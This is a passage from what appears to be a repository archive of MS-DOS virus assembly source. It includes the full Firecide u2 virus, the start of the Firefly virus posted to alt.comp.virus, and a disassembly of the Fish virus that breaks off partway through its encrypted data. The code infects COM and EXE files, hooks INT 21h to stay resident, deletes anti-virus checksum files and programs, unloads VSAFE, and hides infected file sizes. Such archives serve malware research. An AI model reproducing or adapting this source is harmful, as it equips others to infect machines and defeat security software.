;----------------------------------------------------------
pusha ;
;
mov ax,4301h ;restores the atributes
mov cx,word ptr cs:[attrib] ;of the file
int 21h ;
;
popa ;
;----------------------------------------------------------
pushf ;
pusha ; 8-( = f-prot
push si ;
push di ; 8-( = tbav
push bp ;
push es ; 8-) = I'm
push ds ;
;----------------------------------------------------------
mov ax,2524H ;
lea bx,error ;restore the
mov ds,bx ;errors handler
lea bx,error+2 ;
int 21h ;
;----------------------------------------------------------
pop ds ;
pop es ;
pop bp ;restore the
pop di ;resgisters
pop si ;
popa ;
popf ;
;----------------------------------------------------------
JMP A3 ;jmp to orig. INT 21
;
;**********************************************************
; SUBRUTINES AREA
;**********************************************************
;
movedor: ;
;
xor cx,cx ;use to move file pointer
xor dx,dx ;
int 21h ;
ret ;
;----------------------------------------------------------
all: ;
;
XOR AL,AL ;use to set
iret ;error flag
;***********************************************************
; DATA AREA
;***********************************************************
largo dw ?
jump db 0e9h
real db 0cdh,20h,0
hora dw ?
dia dw ?
attrib dw ?
int21 dd ?
error dd ?
ÿ;------------------------
action: ;Nothing Action!
NOP ;only replicate
ret ;Return to call
;------------------------
ÿ;---------------------------------
ANTI_V: ;
MOV AX,0FA01H ;REMOVE VSAFE FROM MEMORY
MOV DX,5945H ;
INT 21H ;
ret ;
;---------------------------------
ÿ;*****************************************************
dir_s:
pushf
push cs
call a3 ;Get file Stats
test al,al ;Good FCB?
jnz no_good ;nope
push ax
push bx
push es
mov ah,51h ;Is this Undocmented? huh...
int 21h
mov es,bx
cmp bx,es:[16h]
jnz not_infected
mov bx,dx
mov al,[bx]
push ax
mov ah,2fh ;Get file DTA
int 21h
pop ax
inc al
jnz fcb_okay
add bx,7h
fcb_okay: mov ax,es:[bx+17h]
and ax,1fh ;UnMask Seconds Field
xor al,byte ptr cs:fechad
jnz not_infected
and byte ptr es:[bx+17h],0e0h
sub es:[bx+1dh],OFFSET FIN - OFFSET START ;Yes minus virus size
sbb es:[bx+1fh],ax
not_infected:pop es
pop bx
pop ax
no_good: iret
;********************************************************************
; THIS DIR STEALTH METOD IS EXTRAC FROM NUKEK INFO JOURNAL 4 & N-POX
;*********************************************************************
ÿaction_dia Db 020H ;day for the action
action_mes Db 0dH ;month for the action
FECHA DW 01eH ;Secon for mark
FECHAd Db 01eH ;Secon for mark dir st
fin:
code ends
end start
MSDOS/F-Index/Virus.MSDOS.Unknown.firecide.asm
+382
View File
@@ -0,0 +1,382 @@
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ-Ä
; Firecide u2 - (c)1995 ûirogen - Using ûiCE v0.2á
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ-Ä
;
; þ Infects COM and EXE when executed.
; þ COM Infection marker: fourth byte is 0
; þ EXE infection marker: Checksum in header not equal to 0.
; þ Time/Date do not change
; þ Read-only and hidden files will be infected, and attributes restored.
; þ Virus installs its own critical error handler
; þ Deletes MSAV,CPAV checksum filez
; þ Call ViCE with JMPs OFF, Anti-TBSCAN On, and Garbage On
;
cseg segment
assume cs:cseg, ds:cseg, es:cseg, ss:cseg
signal equ 0FA01h ; AX=signal/INT 21h/installation chk
vsafe_word equ 5945h ; magic word for VSAFE/VWATCH API
act_day equ 1
buf_size equ 170
vice_size equ 1587+buf_size
virus_size equ (offset vend-offset start)+VICE_SIZE
extrn _vice:near
org 0h
start:
call nx ; get relative offset
nx: pop bp
sub bp,offset nx
push ds es
inc si
mov ax,signal ; are we memory resident?
mov dx,vsafe_word
int 21h
or si,si
jz no_install ; if carry then we are
mov cs:activate[bp],0
mov ah,2ah ; get date
int 21h
cmp dl,act_day ;
jnz no_act
mov cs:activate[bp],1
no_act:
mov ax,ds ; PSP segment
dec ax ; mcb below PSP m0n
mov ds,ax ; DS=MCB seg
cmp byte ptr ds: [0],'Z' ; Is this the last MCB in chain?
jnz no_install
sub word ptr ds: [3],((virus_size+1023)/1024)*64*2 ; alloc MCB
sub word ptr ds: [12h],((virus_size+1023)/1024)*64*2 ; alloc PSP
mov es,word ptr ds: [12h] ; get high mem seg
push cs
pop ds
mov si,bp
mov cx,virus_size/2+1
xor di,di
rep movsw ; copy code to new seg
xor ax,ax
mov ds,ax ; null ds
push ds
lds ax,ds: [21h*4] ; get 21h vector
mov es: word ptr old21+2,ds ; save S:O
mov es: word ptr old21,ax
pop ds
mov ds: [21h*4+2],es ; new int 21h seg
mov ds: [21h*4],offset new21 ; new offset
sub byte ptr ds: [413h],((virus_size+1023)*2)/1024;-totalmem
no_install:
pop es ds ; restore ES DS
cmp cs:is_exe[bp],1
jz exe_return
lea si,org_bytes[bp] ; com return
mov di,0100h ; -restore first 4 bytes
mov cx,2
rep movsw
mov ax,100h ; jump back to 100h
push ax
_ret:ret
exe_return:
mov cx,ds ; calc. real CS
add cx,10h
add word ptr cs:[exe_jump+2+bp],cx
int 3 ; fix prefetch
db 0eah
exe_jump dd 0
is_exe db 0
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Infection routine - called from INT 21h handler.
; DS:DX=fname
;
infect_file:
push dx
pop si
push ds
xor ax,ax ; null ES
mov es,ax
lds ax,es:[24h*4] ; get INT 24h vector
mov cs:old_24_off,ax ; save it
mov cs:old_24_seg,ds
mov es:[24h*4+2],cs ; install our handler
mov es:[24h*4],offset new_24
pop ds
push es ; we'll need it later
push cs
pop es
mov ax,4300h ; get phile attribute
int 21h
mov ax,4301h ; null attribs
push ax cx ; save AX-call/CX-attrib
xor cx,cx
int 21h
mov ax,3d02h ; open the file
int 21h
jc dont_do
mov bx,ax ; get handle
push cs
pop ds
mov ah,3fh ; Read first bytes of file
mov cx,20h
lea dx,org_bytes
int 21h
call kill_chklst
cmp byte ptr org_bytes,'M'
jz do_exe
cmp byte ptr org_bytes+3,0
jz close
mov is_exe,0
mov ax,5700h ; get time/date
int 21h
push cx dx
call offset_end
push ax ; AX=end of file
lea si,start ; DS:SI=start of code to encrypt
mov di,virus_size ; ES:DI=address for decryptor/
push di ; encrypted code. (at heap)
mov cx,virus_size ; CX=virus size
mov dx,ax ; DX=EOF offset
add dx,100h ; DX=offset decryptor will run from
mov al,00000111b ; no jmps,anti-tbscan, garbage, no CS:
call _vice ; call engine!
pop dx
mov ah,40h
int 21h
call offset_zero
pop ax ; restore COM file size
sub ax,3 ; calculate jmp offset
mov word ptr new_jmp+1,ax
lea dx,new_jmp
mov cx,4
mov ah,40h
int 21h
pop dx cx ; pop date/time
mov ax,5701h ; restore the mother fuckers
int 21h
close:
pop cx ax ; restore attrib
int 21h
mov ah,3eh
int 21h
dont_do:
pop es ; ES=0
lds ax,dword ptr old_24_off ; restore shitty DOS error handler
mov es:[24h*4],ax
mov es:[24h*4+2],ds
ret
do_exe:
cmp word ptr exe_header[12h],0 ; is checksum (in hdr) 0?
jnz close
cmp byte ptr exe_header[18h],52h ; pklite'd?
jz exe_ok
cmp byte ptr exe_header[18h],40h ; don't infect new format exe
jge close
exe_ok:
push bx
mov ah,2ch ; grab a random number
int 21h
mov word ptr exe_header[12h],dx ; mark that it's us
mov is_exe,1
les ax,dword ptr exe_header+14h ; Save old entry point
mov word ptr ds:exe_jump, ax
mov word ptr ds:exe_jump+2, es
push cs
pop es
call offset_end
push dx ax ; save file size DX:AX
mov bx, word ptr exe_header+8h ; calc. new entry point
mov cl,4 ; *16
shl bx,cl ; ^by shifting one byte
sub ax,bx ; get actual file size-header
sbb dx,0
mov cx,10h ; divide AX/CX rDX
div cx
mov word ptr exe_header+14h,dx
mov word ptr exe_header+16h,ax
mov rel_off,dx
pop ax ; AX:DX file size
pop dx
pop bx
mov cx,virus_size+10h ; calc. new size
adc ax,cx
mov cl,9 ; calc new alloc (512)
push ax
shr ax,cl
ror dx,cl
stc
adc dx,ax
pop ax ; ax=size+virus
and ah,1
mov word ptr exe_header+4h,dx
mov word ptr exe_header+2h,ax
lea si,start ; DS:SI=start of code to encrypt
mov di,virus_size ; ES:DI=address for decryptor and
push di ; encrypted code (at heap)
mov cx,virus_size ; CX=virus size
mov dx,rel_off ; DX=offset decryptor will run from
mov al,00000110b ; no jmps,anti-tbscan,garbage, use CS:
call _vice ; call engine!
pop dx
mov ah,40h
int 21h
call offset_zero
mov cx,18h ; write fiXed header
lea dx,exe_header
mov ah,40h
int 21h
jmp close
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; set file ptr
offset_zero: ; self explanitory
xor al,al
jmp set_fp
offset_end:
mov al,02h
set_fp:
mov ah,42h
xor cx,cx
xor dx,dx
int 21h
ret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Kill those darned MSAV and CPAV filez..
;
kill_chklst:
mov di,2 ; counter for loop
lea dx,first_2die ; first fname to kill
kill_loop:
mov ax,4301h ; reset attribs
xor cx,cx
int 21h
mov ah,41h ; delete phile
int 21h
lea dx,last_2die ; second fname to kill
dec di
jnz kill_loop
ret
first_2die db 'CHKLIST.MS',0 ; MSAV shitty checksum
last_2die db 'CHKLIST.CPS',0 ; CPAV shitty checksum
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; new 21h
new21:
pushf
cmp ax,signal ; be it us?
jnz not_us ; richtig..
cmp dx,vsafe_word
jnz not_us
xor si,si
mov di,4559h
jmp jmp_org
not_us:
cmp cs:activate,0 ; time to activate?
jz nchk
cmp ah,2 ; output character?
jz do_me
nchk: cmp ax,4b00h ; execute phile?
jnz jmp_org
push ax bx cx di dx si ds es
call infect_file
pop es ds si dx di cx bx ax
jmp_org:
popf
db 0eah ; jump far XXXX:XXXX
old21 dd 0
do_me:
push si
mov si,cs:txt_ptr
mov dl,byte ptr cs:[si]
inc si
cmp si,offset credit_end
jl not_there
mov si,offset credits
not_there:
mov cs:txt_ptr,si
pop si
jmp jmp_org
new_24: ; critical error handler
mov al,3 ; prompts suck, return fail
iret
activate db 0
txt_ptr dw offset credits
credits db 'þFireCide2, by ûirogenþ'
credit_end:
new_jmp db 0E9h,0,0,0 ; jmp XXXX,0
rel_off dw 0
exe_header:
org_bytes db 0CDh,20h,0,0 ; original COM bytes | exe hdr
heap:
db 16h dup(0) ; remaining exe header space
old_24_off dw 0 ; old int24h vector
old_24_seg dw 0
vend:
cseg ends
end start
MSDOS/F-Index/Virus.MSDOS.Unknown.firefly.asm
+75
View File
@@ -0,0 +1,75 @@
From netcom.com!ix.netcom.com!howland.reston.ans.net!cs.utexas.edu!geraldo.cc.utexas.edu!axpvms.cc.utexas.edu!HALFLIFE Tue Nov 29 09:56:01 1994
Xref: netcom.com alt.comp.virus:491
Path: netcom.com!ix.netcom.com!howland.reston.ans.net!cs.utexas.edu!geraldo.cc.utexas.edu!axpvms.cc.utexas.edu!HALFLIFE
From: halflife@axpvms.cc.utexas.edu
Newsgroups: alt.comp.virus
Subject: Firefly virus
Date: 28 Nov 1994 08:51:37 GMT
Organization: University of Texas @ Austin
Lines: 61
Message-ID: <3bc5mq$p63@geraldo.cc.utexas.edu>
Reply-To: halflife@axpvms.cc.utexas.edu
NNTP-Posting-Host: axpvms.cc.utexas.edu
;FIREFLY virus, by Nikademus.
;
;Firefly is an encrypted, memory resident virus which infects
;.COMfiles on load. It incorporates code from Proto-T,
;LokJaw and YB-X viruses and, when in memory, attacks a large selection
;of anti-virus programs as they are executed. Anti-virus programs
;identified by Firefly's execute/load handler are deleted.
;Firefly incorporates simple code from previous issues of the newsletter
;designed to de-install generic VSAFE resident virus activity
;filters designed for Microsoft by Central Point Software. It
;contains instructions - specifically a segment of pseudo-nested
;loops - which spoof F-Protect's expert system generic virus
;identification feature.
;
;FIREFLY also includes a visual marker tied to the system timer
;tick interrupt (1Ch) which slowly cycles the NumLock, CapsLock
;and ScrollLock LEDs on the keyboard. This produces a noticeable
;twinkling effect when the virus is active on a machine.
;
;Anti-anti-virus measures used by Firefly vary in effectiveness
;dependent upon how a user employs software. For example, while
;Firefly is designed to delete the Victor Charlie anti-virus
;shell, VC.EXE, a user who employs the software packages utilities
;for generic virus detection singly, will not be interfered with
;by the virus. Your results may vary, but the virus does effectively
;delete anti-virus programs while in memory unless steps are taken
;beforehand to avoid this.
;
;Firefly incorporates minor code armoring techniques designed to thwart
;trivial debugging.
.radix 16
code segment
model small
assume cs:code, ds:code, es:code
org 100h
len equ offset last - start
vir_len equ len / 16d ; 16 bytes per paragraph
encryptlength equ (last - begin)/4+1
start:
mov bx, offset begin ; The Encryption Head
mov cx, encryptlength ;
encryption_loop: ;
db 81h ; XOR WORD PTR [BX], ????h
db 37h ;
encryption_value_1: ;
dw 0000h ;
;
db 81h ; XOR WORD PTR [BX+2], ????h
db 77h ;
db 02h ; 2 different random words
encryption_value_2: ; give 32-bit encryption
dw 0000h ;
add bx, 4 ;
MSDOS/F-Index/Virus.MSDOS.Unknown.fish.asm
+738
View File
@@ -0,0 +1,738 @@
PAGE 59,132
;==========================================================================
;== ==
;== FISH ==
;== ==
;== Created: 29-Oct-90 ==
;== Version: ==
;== Passes: 5 Analysis Options on: AFKOPUX ==
;== ==
;== ==
;==========================================================================
movseg macro reg16, unused, Imm16 ; Fixup for Assembler
ifidn <reg16>, <bx>
db 0BBh
endif
ifidn <reg16>, <cx>
db 0B9h
endif
ifidn <reg16>, <dx>
db 0BAh
endif
ifidn <reg16>, <si>
db 0BEh
endif
ifidn <reg16>, <di>
db 0BFh
endif
ifidn <reg16>, <bp>
db 0BDh
endif
ifidn <reg16>, <sp>
db 0BCh
endif
ifidn <reg16>, <BX>
db 0BBH
endif
ifidn <reg16>, <CX>
db 0B9H
endif
ifidn <reg16>, <DX>
db 0BAH
endif
ifidn <reg16>, <SI>
db 0BEH
endif
ifidn <reg16>, <DI>
db 0BFH
endif
ifidn <reg16>, <BP>
db 0BDH
endif
ifidn <reg16>, <SP>
db 0BCH
endif
dw seg Imm16
endm
DATA_1E EQU 0B3H ; (97E0:00B3=0)
DATA_5E EQU 5A2BH ; (97E0:5A2B=0)
DATA_6E EQU 5E5DH ; (97E0:5E5D=0)
DATA_7E EQU 6920H ; (97E0:6920=0)
SEG_A SEGMENT BYTE PUBLIC
ASSUME CS:SEG_A, DS:SEG_A
ORG 100h
FISH PROC FAR
START:
JMP LOC_4 ; (0EDE)
PUSH AX
CMC ; Complement carry
SUB DX,SI
JLE $-3FH ; Jump if < or =
SUB AL,7FH
REP MOVSB ; Rep when cx >0 Mov [si] to es:[di]
POP ES
POP DS
POP DI
ADD CL,CH
RETF 0CD0DH ; Return far
AND [BX+DI+50H],BH
nop ;*ASM fixup - displacement
MOV SI,DATA_7E ; (97E0:6920=0)
JNC LOC_1 ; Jump if carry=0
DB 'a tiny VOM p'
DB 0EBH, 7AH, 67H, 72H, 61H, 6DH
DB 00H, 9CH, 2EH,0FFH, 1EH, 35H
DB 0EH,0C3H
DB 0DH, 4EH, 42H, 49H, 23H, 82H
LOC_1:
OR SP,DI
ADD DX,DS:DATA_6E[BX+DI] ; (97E0:5E5D=0)
POP SP
POP DI
POP BX
POP DX
ADC CX,[BP+DI]
AND SI,DX
SUB SP,DI
ADD SP,[BP+DI]
OR BYTE PTR [BP+DI],0E7H
ADD CX,[BP+SI]
ADC DL,[BP+SI+53H]
PUSH DI
PUSH SP
PUSH SI
PUSH BP
NOP
AND SI,DX
SUB SP,DI
ADD BX,[BP+45H]
DEC SP
POP DI
INC SI
AND AX,DS:DATA_5E[SI] ; (97E0:5A2B=0)
ADD AH,[BP+DI]
SBB WORD PTR [BP+DI],254H
ADD BX,[BP+SI]
AND AX,[BP+562BH]
ADD AH,[BP+DI]
IN AX,0DEH ; port 0DEH
DB 0F2H, 23H, 83H, 1BH, 54H, 02H
DB 23H, 84H, 2BH, 56H, 02H, 23H
DB 86H, 2BH, 5AH, 02H,0CEH, 23H
DB 84H, 2BH, 5AH, 02H, 23H, 81H
DB 1BH, 54H, 02H, 03H, 1AH, 23H
DB 86H, 2BH, 56H, 02H, 23H,0E5H
DB 96H,0F2H, 23H, 83H, 1BH, 54H
DB 02H, 23H, 84H, 2BH, 56H, 02H
DB 23H, 86H, 2BH, 5AH, 02H,0CEH
DB 81H,0B3H, 46H, 03H, 23H,0C9H
DB 33H, 38H, 03H, 03H, 12H,0F1H
DB 0B4H
DB 8, 0DH, 0A1H, '+', 8BH, 8, 85H, 'I'
DB 0F2H, 4AH,0EFH,0FBH,0CEH, 4EH
DB 4CH, 5FH, 5DH,0BDH, 0CH, 03H
DB 12H,0B7H,0BAH, 01H,0E5H, 0CH
DB 0DH,0CEH, 0BH, 5EH, 3EH,0D6H
DB 83H,0CEH, 87H,0D5H,0DCH,0EEH
DB 0DCH,0EEH, 2BH, 84H, 1AH, 2BH
DB 81H, 52H, 0FH, 56H, 0AH,0CEH
DB 13H, 5BH, 3EH,0FBH, 83H,0D3H
DB 3FH,0E9H, 86H,0FDH,0DCH,0EBH
DB 0DCH,0EBH, 86H, 11H, 83H, 49H
DB 0FH, 53H, 12H,0CEH, 4FH, 4CH
DB 5EH, 5EH,0E5H,0BDH, 0FH,0B4H
DB 0E5H, 5BH, 07H, 83H, 23H,0AEH
DB 0EEH, 03H,0B9H, 5FH, 23H,0CAH
DB 0BH, 56H, 02H, 0DH, 1DH, 23H
DB 81H, 13H, 48H, 03H,0E5H, 8DH
DB 06H,0E6H,0C0H, 2CH, 2BH, 86H
DB 4AH,0F3H, 23H,0AEH, 4AH, 03H
DB 03H, 12H,0E5H, 3DH, 07H,0ACH
DB 0BDH, 2CH,0E5H,0BEH,0F2H, 81H
DB 0BH, 22H, 03H, 84H, 13H, 20H
DB 03H,0B7H,0BAH, 01H,0BDH, 0CH
DB 0CBH, 0BH, 5DH, 03H, 0DH,0E5H
DB 85H,0F2H, 91H, 55H, 00H, 0DH
DB 0CH, 5DH, 90H, 91H,0B9H, 6CH
DB 0F2H, 13H, 20H, 03H, 91H, 55H
DB 28H,0F2H,0F3H, 5DH, 90H,0E5H
DB 0ECH, 0CH,0AEH,0C9H, 33H, 20H
DB 03H, 81H, 0BH, 3AH, 03H,0CBH
DB 0BH, 46H, 03H,0E7H,0CAH, 0BH
DB 41H, 03H, 56H, 00H, 84H, 33H
DB 38H, 03H, 81H, 03H, 43H, 03H
DB 0E5H, 0AH, 0DH,0E5H, 2BH,0F2H
DB 0E5H, 1AH, 07H, 84H,0BDH, 22H
DB 0E5H, 56H,0F2H, 81H,0CEH, 23H
DB 34H, 13H, 4AH, 03H, 7EH, 11H
DB 0E5H, 32H, 07H, 23H, 83H, 13H
DB 22H, 03H, 23H,0F2H, 3BH, 20H
DB 03H, 57H,0BDH, 1EH,0E5H, 24H
DB 0F2H, 3EH,0D6H, 83H,0D6H,0CBH
DB 0BH, 78H, 09H, 0FH,0CEH
DB '-KD^E-[D_X^-.;- -HLNE-IDKK- -OBC'
DB 'C-?"4=-*sfcwt{bp*)'
DB 0E5H,0CFH,0F3H, 23H, 81H, 03H
DB 43H, 03H,0E5H,0B7H,0F3H, 03H
DB 12H, 13H, 0AH,0ACH, 48H, 03H
DB 83H,0CDH, 2BH,0C8H, 1BH, 07H
DB 0DH, 83H,0D5H, 08H, 1DH, 0DH
DB 23H, 0CH, 0BH, 17H, 0DH, 23H
DB 8DH, 33H, 2DH, 0DH, 0DH,0F6H
DB 78H, 29H, 23H,0ACH, 09H, 0DH
DB 0AEH, 0DH, 0CH, 23H,0ACH, 0BH
DB 0DH,0AEH, 0FH, 0CH, 23H,0ACH
DB 05H, 0DH,0AEH, 09H, 0CH, 23H
DB 0F2H, 3BH, 48H, 03H, 3EH,0CDH
DB 0F3H,0C9H, 5DH, 23H,0ACH,0EEH
DB 03H,0C6H, 23H, 0CH, 0BH, 1FH
DB 0DH, 23H,0ACH,0EEH, 03H, 23H
DB 86H, 2BH, 19H, 0DH, 23H, 83H
DB 1BH, 1FH, 0DH, 23H,0F2H, 23H
DB 15H
DB 0DH, 59H, 5FH, 42H, 58H, 59H
LOC_2:
DB 3EH,0E9H,0E5H, 0DH, 0DH, 84H
DB 0C8H, 81H,0C5H,0B6H, 1DH, 0DH
DB 0FAH,0EEH, 54H, 8CH,0E4H, 42H
DB 0FH, 0EH,0CCH, 8EH,0DFH, 0DH
DB 0FAH,0FEH, 5DH,0B5H,0F7H, 0DH
DB 5DH, 84H,0E5H,0C6H,0E5H,0C1H
DB 0DH,0C0H,0E5H, 29H, 07H,0C6H
DB 5EH, 86H,0D1H, 3BH, 86H, 52H
DB 0BH, 23H, 84H, 13H,0BEH, 03H
DB 56H, 58H, 84H,0E8H,0E5H,0DDH
DB 05H,0AEH,0E5H,0FCH,0F0H,0E5H
DB 19H,0F3H,0E5H,0CBH,0F0H,0E5H
DB 95H,0F0H,0E5H,0CDH, 05H, 85H
DB 8DH,0F1H, 02H, 78H, 09H,0E4H
DB 0E4H, 0DH,0B5H, 8DH,0F1H, 1CH
DB 78H, 09H,0E4H, 96H, 0DH,0ACH
DB 8DH,0F1H, 1FH, 78H, 09H,0E4H
DB 9FH, 0DH, 84H, 8DH,0F1H, 19H
DB 78H, 09H,0E4H, 04H, 0CH,0E6H
DB 8DH,0F1H, 2CH, 78H, 09H,0E4H
DB 0F9H, 0DH, 81H, 8DH,0F1H, 2EH
DB 78H, 09H,0E4H, 89H, 0CH,0AEH
DB 8DH,0F1H, 2AH, 78H, 09H,0E4H
DB 0EDH, 0DH,0E6H, 8DH,0F1H, 30H
DB 78H, 09H,0E4H,0CBH
DATA_3 DW 0F20CH ; Data table (indexed access)
DB 8DH,0F1H, 33H, 78H, 09H,0E4H
DB 0CH, 0FH,0ACH, 8DH,0F1H, 32H
DB 78H, 09H,0E4H, 70H, 0AH, 85H
DB 8DH,0F1H, 4FH, 78H, 09H,0E4H
DB 4FH, 0AH, 81H, 8DH,0F1H, 46H
DB 78H, 09H,0E4H, 11H, 0FH,0E6H
DB 8DH,0F1H, 43H, 78H, 09H,0E4H
DB 5EH, 05H, 84H, 8DH,0F1H, 42H
DB 78H, 09H,0E4H, 47H, 05H, 83H
DB 8DH,0F1H, 5AH, 78H, 0EH,0E4H
DB 0C2H, 0BH,0E4H, 5AH, 04H,0E6H
DB 0E5H, 7FH, 04H,0ACH,0E5H, 5EH
DB 0F0H,0E5H, 7BH,0F0H,0E5H, 25H
DB 0F0H, 84H,0E8H, 23H,0F2H, 3BH
DB 0BEH, 03H, 82H, 4BH, 0BH, 50H
DB 0C2H, 23H,0F2H, 0BH, 3CH, 03H
DB 0E4H, 19H, 05H,0ACH,0E5H,0F5H
DB 0F1H,0E5H,0DAH,0F1H, 07H,0CDH
DB 78H,0D9H,0E5H,0D6H,0F1H,0E5H
DB 0CCH, 0CH,0BDH, 0DH, 8DH, 32H
DB 0F2H, 78H, 0BH, 87H, 4AH, 0BH
DB 8EH,0CEH, 0AH, 23H, 2DH, 0BH
DB 0FDH, 03H,0FBH, 4AH, 17H, 8DH
DB 79H, 18H, 8DH, 62H, 17H,0C5H
DB 23H, 8DH, 33H,0FDH, 03H, 0DH
DB 78H, 04H, 8CH, 62H, 10H, 0DH
DB 03H, 8EH, 52H, 12H, 0DH,0E5H
DB 0B6H,0F1H,0E6H, 91H, 4BH, 44H
DB 43H,0E5H,0BEH,0F1H,0E5H, 9FH
DB 0F1H,0E5H, 97H,0F1H, 07H,0CDH
DB 78H,0E6H, 84H,0DEH,0FBH, 4AH
DB 18H, 8DH, 79H,0EEH, 8DH, 62H
DB 18H,0C5H, 8CH, 62H, 1DH, 0DH
DB 03H, 8DH, 52H, 1FH, 0DH,0E6H
DB 0D9H, 23H,0F2H, 03H, 3CH, 03H
DB 0E4H,0AFH, 0AH,0AEH,0EEH, 16H
DB 84H,0DEH, 86H, 7AH, 2CH, 06H
DB 7AH, 2EH, 78H, 1CH,0E6H, 07H
DB 84H,0DEH, 86H, 4AH, 01H, 07H
DB 4AH, 2DH, 78H, 08H,0E5H,0EEH
DB 09H, 7EH, 0EH,0E4H, 45H,0F2H
DB 0E5H, 6BH,0F1H,0E5H, 5DH,0F1H
DB 0E5H, 4FH,0F1H, 84H, 43H,0F5H
DB 84H, 4BH,0F1H, 13H, 5FH,0E5H
DB 26H, 0CH, 8EH, 72H, 19H, 0CH
DB 79H, 16H, 86H, 0AH, 0EH, 4AH
DB 0FH, 5EH, 86H, 52H, 09H,0FAH
DB 0DEH, 0CH,0D5H, 56H, 79H, 06H
DB 8EH,0C9H, 09H,0E4H, 76H,0F2H
DB 40H, 58H, 5EH, 46H, 54H, 57H
DB 12H, 84H,0DBH, 03H, 0AH,0B4H
DB 28H, 0DH,0B2H,0B8H, 03H,0FEH
DB 0A9H,0B2H,0B8H, 03H, 03H, 12H
DB 86H, 58H, 1FH, 86H, 48H, 1DH
DB 08H, 02H, 03H, 8EH,0DFH, 0DH
DB 28H,0FDH,0F2H, 84H, 58H, 1FH
DB 84H, 48H, 1DH, 20H,0F1H, 00H
DB 8EH,0D7H, 0DH, 84H, 58H, 2EH
DB 84H, 48H, 2CH,0B4H, 11H, 0DH
DB 0CAH, 48H, 03H, 0CH, 0DH,0B9H
DB 2AH, 84H,0F7H,0E5H,0DEH,0F6H
DB 0E4H, 3DH,0F2H, 03H, 0AH,0B2H
DB 0B8H, 03H,0B4H, 28H, 0DH, 84H
DB 0DBH,0FEH,0A9H, 13H, 5FH, 03H
DB 12H,0B9H, 02H,0B7H,0B8H, 03H
DB 0E5H,0B5H,0F6H,0B9H, 1DH,0E5H
DB 0BEH,0F6H,0FBH, 0BH,0C7H, 03H
DB 8DH, 53H, 12H, 79H, 26H, 23H
DB 0C9H, 13H,0C8H, 03H, 81H,0CDH
DB 8CH,0E6H, 0DH, 03H, 10H, 0DH
DB 0DH, 3EH,0DFH, 23H, 86H, 03H
DB 0CEH, 03H, 44H, 0CH,0C6H, 18H
DB 0DH, 0DH, 4CH,0FAH,0FCH, 84H
DB 49H, 2EH, 9FH, 9EH,0FAH,0FCH
DB 84H, 49H, 2CH,0E4H,0D2H,0F3H
DB 0E4H, 74H,0F3H,0E5H, 61H, 09H
DB 0E5H, 18H, 09H, 7FH, 34H, 23H
DB 8DH, 33H,0AFH, 03H, 0DH, 79H
DB 3CH,0E5H, 64H, 09H, 8EH,0F6H
DB 0F2H, 79H, 24H, 23H,0F3H, 03H
DB 0AFH, 03H, 03H, 0AH,0B4H, 19H
DB 0DH,0B2H, 5FH, 03H, 3EH,0CDH
DB 0FFH,0A2H, 23H,0ACH,0AEH, 03H
DB 2BH, 84H, 48H,0F3H, 2BH, 84H
DB 50H, 2BH, 84H, 53H,0F1H, 23H
DB 8DH, 2BH,0BEH, 03H,0F3H,0E4H
DB 96H,0F3H,0E4H, 38H,0F3H, 03H
DB 0AH,0E5H, 2BH, 09H,0B4H, 19H
DB 0DH, 23H,0ACH,0AEH, 03H,0B2H
DB 5FH, 03H,0FFH
DB 0A2H, 'x', 1BH, '+6P+x'
DB 0FBH, 2BH,0CAH, 48H,0F3H, 0DH
DB 0DH,0E5H, 1AH, 0FH, 23H,0F3H
DB 0BH,0AFH, 03H,0E6H,0C6H,0E4H
DB 04H,0F3H,0B9H, 22H, 0BH,0E5H
DB 0BH,0F6H, 0BH, 12H, 0AH,0CEH
DB 07H,0CDH, 79H, 0EH,0E4H, 5BH
DB 0CH, 13H, 5FH, 23H, 81H, 0BH
DB 2BH, 03H, 23H, 84H, 13H, 29H
DB 03H, 23H,0C8H, 3BH, 29H, 03H
DB 0B4H, 03H, 0DH,0B2H,0FCH, 03H
DB 03H, 0AH,0FEH,0A9H, 53H, 12H
DB 0B4H, 5DH, 0DH,0B2H, 0AH, 02H
DB 0FEH,0A9H,0B6H,0F2H,0F2H,0E5H
DB 0E3H,0F7H, 50H, 23H, 82H, 0BH
DB 0EBH, 03H, 23H, 82H, 0BH,0E5H
DB 03H, 23H, 82H, 0BH,0BEH, 03H
DB 03H,0B5H, 0CH, 46H, 0AH, 91H
DB 0B6H,0FCH, 03H, 23H,0F2H, 13H
DB 38H, 03H, 7EH, 2DH, 23H, 8EH
DB 03H,0BEH, 03H, 0CH, 23H,0F2H
DB 3BH,0BEH, 03H, 23H,0F2H, 3BH
DB 0E5H, 03H, 23H,0F2H, 3BH,0EBH
DB 03H, 58H, 23H,0C9H, 13H, 29H
DB 03H, 84H,0E8H,0E4H, 9CH,0F0H
DB 0E5H, 8DH, 0EH, 03H, 0AH,0B4H
DB 19H, 0DH,0B2H, 5FH, 03H, 23H
DB 0ACH,0AEH, 03H,0FFH,0A2H, 78H
DB 00H, 2BH,0CAH, 48H,0F3H, 0DH
DB 0DH, 23H,0F3H, 0BH,0AFH, 03H
DB 0E6H,0E6H, 23H,0C8H, 3BH, 0EH
DB 02H, 8EH,0F3H, 0CH, 78H, 39H
DB 86H, 1BH, 17H, 0DH, 8EH,0CFH
